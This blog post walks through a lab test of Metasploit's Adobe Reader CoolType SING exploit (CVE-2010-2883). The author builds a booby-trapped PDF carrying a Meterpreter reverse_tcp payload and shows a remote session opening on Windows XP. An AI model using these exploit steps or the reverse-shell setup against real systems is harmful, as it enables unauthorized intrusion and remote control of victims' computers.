Thursday, September 9, 2010

Adobe 0day cooltype and metasploit

Once more metasploit is way ahead of competition, this time with a 0day for adobe pdf reader. Having some time today i thought i give it a try.

In a windows 7 vm, i got the latest pdf reader from adobe  ( version 9.3.4 at the moment )

Now on the metasploit console,

root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >

msf exploit(adobe_cooltype_sing) > info

       Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Unknown
   <@sn0wfl0w>
   <@vicheck>
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                 Required  Description
  ----        ---------------                 --------  -----------
  FILENAME    msf.pdf                         yes       The file name.
  OUTPUTPATH  /home/root/trunk/data/exploits  yes       The location of the file.

Payload information:
  Space: 1000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the Smart INdependent
  Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
  Adobe Reader. Prior version are assumed to be vulnerable as well.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
  http://www.osvdb.org/67849
  http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
  http://www.adobe.com/support/security/advisories/apsa10-02.html

msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >

Let's get the msf.pdf now and start a generic handler on the msfconsole.



msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

On the windows 7 now, 

Clicking the msf icon,


No luck at the moment on windows 7, the application crashed with no session. Trying the same on windows XP the screen shows the following:


And on our server we have:

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010

meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter >

I hope it won't take long for the windows 7 version.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)